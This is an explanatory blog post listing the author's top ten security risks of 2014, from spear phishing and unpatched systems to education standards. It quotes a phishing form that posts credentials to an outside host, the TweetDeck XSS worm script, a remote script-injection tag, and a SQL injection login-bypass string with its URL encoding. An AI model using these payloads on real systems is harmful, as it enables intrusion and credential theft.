Top 10 Real Security Risks of 2014

Introduction

There are lot of Top 10 security risks for the year, so I thought I’d collect mines, and give a few that are maybe obvious, and some that are not so much. We have been through many phases of security risks, from worms and viruses, and now we are seeing more targeted attacks, with a focus, typically, on getting user details. The following define some key security risks for both society and users.

Top 10 Real Security Risks

So here are the Top 10 Security Risks, in order of importance:

bot1. Spear Phishing. I’ve put this one at Number 1, as it is one of the most significant risks at the current time, as you can put all the security in place that you like, but if a user clicks on a link with a piece of malware, there’s not much any defence can do. The spear part is significant, as increasing spamming is target, from just knowing that your email address is active, to a targeted email which matches the bank that you use. As you can see in Figure 1, this is a phishing email that actually looks quite valid, and they have avoided using a hyperlink in the body of the email (thus avoiding a rollover on the link. In this case the tricking of the user is done in the HTML file attached, which tends to be a less malicious attachment than other types, such as for Word documents and Flash files. When the user clicks on the HTML file they are greeted with a nicely formatted page which looks exactly like the HMRC page. This is a carbon copy, as they have scrapped the page from the real site, and then changed on small thing:

<form action="http://eneperi.com/Eusk/done.php" name="processForm" method="POST" 
onsubmit="return submitIt(this)">

which will submit all the details you have entered into http://eneperi.com/Eusk/done.php. As you may expect, it doesn’t exist anymore, as the harvesting agent is long since gone.

Screen Shot 2014-06-22 at 15.25.21Figure 1: Example of a spear phishing email.

bug2. Unpatched Systems. Apart from users clicking on links, which most systems can do very little about, it is unpatched systems which gives us the greatest threat. With this, there can be a well-known vulnerability, and where someone has written a piece of software which can exploit it. Just this what happened with Heartbleed, where a vulnerability was found in the protocol used for the heartbeat signal between two systems in a secure connection. Within hours the Internet was full of Python scripts which exploited the vulnerability, and in which anyone from home land defence agents to script kiddies could use. After this it was a matter of finding systems to exploit. So for many administrators it is a continual fight to patch and fix problems. But it is the home users who are typically the sloppiest, and it is three main threats which expose them most: CVE-2013-5331 (Adobe Flash), CVE-02007-0071 (Adobe PDF) and CVE-2013-1723 (Java). If a user has an unpatched system, they can be exposed to each of these vulnerabilities. The threats are fairly easy to implement for script kiddies using exploit kits such as the Phoenix Exploit Kit v2.5, which has all the scripts required to create the documents and the code required to exploit the user’s machine (Figure 2). There’s a whole industry in exploit kits, where, for a maintenance fee, the Exploit Kit creators will patch their exploits to make use of the most up-to-date vulnerabilities, and try and overcome some of the patches applied by venders.

Slide24Figure 2: Unpatched systems

Mining Man3. Botnets. It may shock you, but there are a whole army of zombies out there, who are given tasks by their master, and will blindly carry it out with little thought on the bandwidth or processing power they are consuming. What is being created is one of the largest distributed data harvesting systems every created, and they are waiting for you, or who wants to communicate with them, to do their harvesting. Many thing they are out there just for user details, but there are a whole lot of other ones who are out there harvesting whatever information that the master has defined them. Remember, I can automated a task to do a look-up on a domain name, in order to gain an IP address, by getting a bot to call up a domain name service from a Web site. Here’s an example from the logs on my site. For some reason, a bot has decided it wants to get my site to resolve a range of domain names to IP addresses, and tries to call /ip/whole with the correct parameter of site=”sitename”. The log shows that it gets a 404 message, which means the page does not exist (as I got rid of it), but the bot blindly just keeps going, with a different IP address for every access, so it’s very difficult to block:

2014-06-21 00:00:02 10.185.7.7 GET /ip/whois site=studentconference.net 80 - 198.50.161.59   
 Opera/9.80+(Windows+NT+6.2;+Win64;+x64)+Presto/2.12.388+Version/12.16 404 0 0 31
2014-06-21 00:00:07 10.185.7.7 GET /ip/whois site=isaev.info 80 - 71.211.183.241 
 Opera/9.80+(Windows+NT+6.2;+Win64;+x64)+Presto/2.12.388+Version/12.16 404 0 0 140
2014-06-21 00:00:07 10.185.7.7 GET /ip/whois site=gosonicgo.com 80 - 167.88.115.209 
 Opera/9.80+(Windows+NT+6.2;+Win64;+x64)+Presto/2.12.388+Version/12.16 404 0 0 155
2014-06-21 00:00:09 10.185.7.7 GET /ip/whois site=ledgewood.com 80 - 50.23.115.95 
 Opera/9.80+(Windows+NT+6.2;+Win64;+x64)+Presto/2.12.388+Version/12.16 404 0 0 202

The Zeus botnet, for example, makes use of the vulnerabilities given at No 2 (unpatched systems – Flash, PDF and Java), to harvest data from the user’s machine in order to gather it within its network, where the user’s machine becomes a client for gathering information. This can include screen captures of users entering their password characters when the log-into the bank account. As long as someone has a compromised machine on the Internet, there will be botnet. With masses of Windows XP, Windows ME, and so on, with lots of unpatched systems, there will be more places for bots to hide, and not less. Stopping them is almost impossible, as the code for creating these systems is well known, and it takes very little skills to go ahead and create your own one.

Anonymous face4. XSS (Cross-site scripting). Last week, TweetDeck started to spam tweets across the Internet, and it was caused by adding a heart symbol (♥) to the tweet, which caused the system to run a script within TweetDeck, and send a message to the user, and re-tweet links which had just arrived:

<script class="xss">$('.xss').parents().eq(1).find('a').eq(1).click();
$('[data-action=retweet]').click();alert('XSS in Tweetdeck')</script>♥

This highlights the current problem were Web developers spend very little time on analysing the user input for malicious code It simple use it just where a value is taken from the user input, and echo’ed straight to the Web page without checking, so when the user enters:

<script>alert(‘Oops I have been compromised’);</script>

it then echoed to the page, and, of course, will run the scripts as a piece of Javascript, and display a message box with “Ooops I have been compromised“. A common method of breaching a page is where unchecked user input is used to inject malicious code from a remote site. For example:

<script src="http://1.2.3.4/test.js"></script>

will inject some malicious code from a server at 1.2.3.4 into the page, which can cause a whole range of problems, such as breaching the login requirements for a page (see the demo for this).

Many Web sites use LAMP – Linux, Apache, MySQL and PHP. This often uses PHP code to send SQL requests to a MySQL database. A typical call to a database is:

SELECT * FROM accounts WHERE username=’$admin’ AND password=’$pass’

And where the users enters “admin” and “password” gives:

SELECT * FROM accounts WHERE username=’admin’ AND password=’password‘

Then an intruder could change this to:

SELECT * FROM accounts WHERE username=’admin’ AND password=’’ OR 1=1 – ‘

Which will always return a true for the match. To achieve this enter the following as a password:

‘ OR 1=1 --

And convert this to a URL string:

%20%27%20%4f%52%20%31%3d%31%20%2d%2d%20

When this is injected into the URL request for the page, it will show all the usernames and passwords on the database. There is almost an infinite number of these exploits, and an intruder will generally play around with a canary (forcing some text into the input and observing what happens).

5 Scare Stories in the Media. The main headline story on the BBC a few weeks ago was:

People have two weeks to protect themselves from 'powerful computer attack'

botand little has happened since. In fact the Zeus botnet infrastructure has been around for quite a while, and happily gathering information on users. So the shocking headline seems to imply that something big is happening, and it can only be constrained for two weeks, and then it’ll explode. I think the headline feels like we are being told that a bomb is going to go off in two weeks, and you’ve got that time to get protection in place.

In this case, the Zeus bomb, and all the associated botnets, went off some time ago, and there’s very little that can be done about stopping them. The key thing is that users look after themselves better on-line, and not that there is a single piece of software that can thwart all the Zeus-related threats. As long as there is one unpatched Windows XP system around, there’s a hiding place for a bot. As these bots are using peer-to-peer systems to find their master, the botnet master can appear anywhere, and rally their troops on their harvesting exercises. So grabbing hold of a few bot masters, and strangling them, is not really going to cause any long term damage to their infrastructure. In fact, it almost feels like the Internet is becoming alive, with its own in-built eco-system.

While Heartbleed was real and new, the new threats of the Zeus botnet are not actually new. When it comes down to it, on the Internet, the true threats are the well known vulnerabilities that are fixed by users patching their systems, and not necessarily people rushing to update their virus scanners. Patch your system, and you are much less exposed than updating your virus scanner. So the threat is not a new one, and the “two weeks to an explosion” is really not precise. So a stronger message could be to define what a user should observe in a phishing email – don’t click on links in HMRC emails – and patch your system. In fact, don’t click on any email links unless you know they are fully trusted.

The paper published on the Zeus botnet goes back to 2011 where a university academic group managed to take-over the Zeus network, and analysed the username, passwords and credit card details of users. With the latest threat, we are told that someone, somewhere is holding back the tide, and they can only do this for two weeks, and then it will be unleashed. I think this could be hype, especially in gear up activity within the security community.

Connected People in Network6. Critical Infrastructure Failure. The dependency on the Internet becomes more apparent every day, and many users and business fail to see that the access to it, and it’s services are dependent on critical infrastructures. A failure in one part of an interconnected system can cause the whole thing to collapse. An example has happened recently where Anonymous took over GoDaddy’s domain name service because it supported the Stop Online Piracy Act in the US (which is a Congressional bill which allows copyright owners to gain court orders to take sites offline for practicing or aiding piracy). It should be remember that critical infrastructure can be seen as anything which the whole system depends on, so electrical power, domain name services, identity services, IP address allocation, networked devices, and so on, or all part of this infrastructure, and need to be protected. The easy way is to setup a failover, where if a critical device or server, then a new one will replace it. This, though, is often a hard sell to the CEO, where a system administrator will be asked, “What benefit does it have?”, … “Well if one goes down, it replaces it!”, … “Well … I can’t see the business case in that”. So it is up to us all, to make sure that our critical infrastructure protection is in-place, in the same way that we would put in protection for our physical world.

Large safe, open7. Resistance to Change. This might seem a strange one to add, but one of our great threats is a resistance to change our existing systems because of security problems. This is seem in health and social care in the UK, where there is virtually no access for users to either own health and social care records, and very little governance of the sharing of information across disparate systems. Every headline of health records being breached, sets back the agenda of getting systems on-line. Often it is a naive debate, where we have an all or nothing approach, but there are so many services which could go on-line now, and have low risks associated with them. Our risk is thus to keep all our data behind existing barriers, and not look to re-architect to properly integrate users with their own data. In 2013, in the US, there were over 619 health care related incidents of over 40 million records disclosed. This must be seen as a problem mainly related to the way we have built our systems and where we put the data. Only with a re-think will we be able to keep highly sensitive information under strong security control, and less around others. To be able to view your inoculations, or book appointments with GPs, seem such as trivial thing, and should be a top priority for any modern information nation.

Remember, just because something is a risk, it is no real reason for that only to be the thing to stop its development. There can be so many blockers in the way, and it needs leadership to push against these blockers. One I heard was that it would not be possible to Skype with a GP, as Skype was seen as a security risk. Surely, everything is a security, and it’s a balance to benefit against risk? The risk of an ill person getting on public transport must overrule any small risks around Skype, and its associated protocols. In Scotland, the Scottish Government has put a target of 2020 for getting health care records on-line … the question that must be asked … why does it take so long and can’t we get some simple things on-line first? From the work we have done, repeat prescriptions and booking appointments with clinicians are two of the most popular on-line services which users want. But ask yourself … when was the last time you were asked about what you wanted from your health care services … and if the answer is “Never” then you should worry!

8. IP Theft. In the past the greatest threat was from outsiders probing systems. As firewalls have become smarter, and with the increasing use of NAT (Network Address Translation), which hides the internal network to external access, it has become more difficult to gain a foothold on a system. The greatest threat is that once an intruder is inside the network, they can generally move around the system, and steal IP (Intellectual Property) with few barriers in their way. Many companies struggle to know exactly what their IP actually is, and were it is stored and how access to it is controlled. Thus, companies need to known where their secrets are stored, especially when it is stored in open source areas, such as with Dropbox. A simple method of username and password is often not sufficent enough to protect key IP assets, and where multi-factor access is key to enhanced protection. Companies also need to avoid just using knowledge as the key barrier for access to an asset. Ask a user for their date of birth these days, is almost like asking a null question, where everyone’s birthday can be determined from open source searches. Out-of-band authentication, such as with SMS Pin codes to a mobile device, are key to verifying user access to sensitive information.

9. Big Brother. This might not seem an obvious security risk, but the gathering and aggregation is becoming simpler, and are often few barriers within existing public sector systems to stop users gaining access to privileged information that can be brought together. On the one hand we have the rights to privacy, and on the other hand we have the risks to society, and many countries are now struggling to balance the two, where a properly defined governance infrastructure can be setup to protect the rights of the individual, while also detecting risks around copyright breaches, tax evasion, child protection, and so on. We must worry whenever we see new systems being put in-place which gather information, and for their to be little discussion on how they are being used, and how citizens will be integrated into them. Any system which says it is gathering information around citizens because there is a generally defined risk, must be open to review to make sure the system itself is secure, and that the gathering is worth it. As we move into an age where data is never really deleted, or where the veracity of it is checked, we could have a whole lot of data what can be used for purposes that it was not intended for, and that could be incorrect.

10. Lack of standards in Security Education. The final risk is also a strange one, but just as important as the others. As a personal observation, I’ve seen too many graduates who seem to have very little understanding of some core principles around security. We have done many job interviews, and have seen PhD and MSc graduates struggle to even articulate the basics of even private key cryptography. This can be likened to an electrician not being able to select the right fuse to go into a plug, or struggle to calculate the current in a circuit based on the applied voltage and resistance. So you may worry about the actual security of systems, especially in its software and hardware infrastructure, where software engineers often do not get any formal education in cryptography or even the basics of hashing passwords.

And those that just missed the Top 10:

  • The evil of the Internet. The Internet we have created is amazing in terms of the access it provides for every citizen in the World, but also allows a platform for those with a grievence, and for those who do not properly understand the damage that their comments can make to the individuals involved. As Cyberbullying starts to be seen as a crime, it should hopefully stop those who post vile comments, and for them to understand that the countries of the World are teaming together to try pin-point individuals and being them to justice.
  • Identity Theft. A kids about the thing that worries them most on the Internet, and they will often say that it is someone stealing their identity. As we focus increasing on a single identity, our own identity becomes key, and users must protect it in whatever way possible.
  • Not putting the citizen at the centre of systems. As we re-architecture own on-line public services, the citizen must be placed at the centre of the designs, and for services to be build around them. Too often, in the past, have barriers been put in-place for lack of computer literacy, but the Apple iPad has changed this, and there is now few reasons for supporting on-line systems which not only integrate citizen, but also their families, who are often as much the key carers, as other more formal roles.
  • DDoS. Very popular as a tool of choice for many with a grievance against a company, but as high-risk organisations are moving to 24×7 defence support, in Security Operations Centres, the defences are not in-place to thwart these.

One thought on “Top 10 Real Security Risks of 2014

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s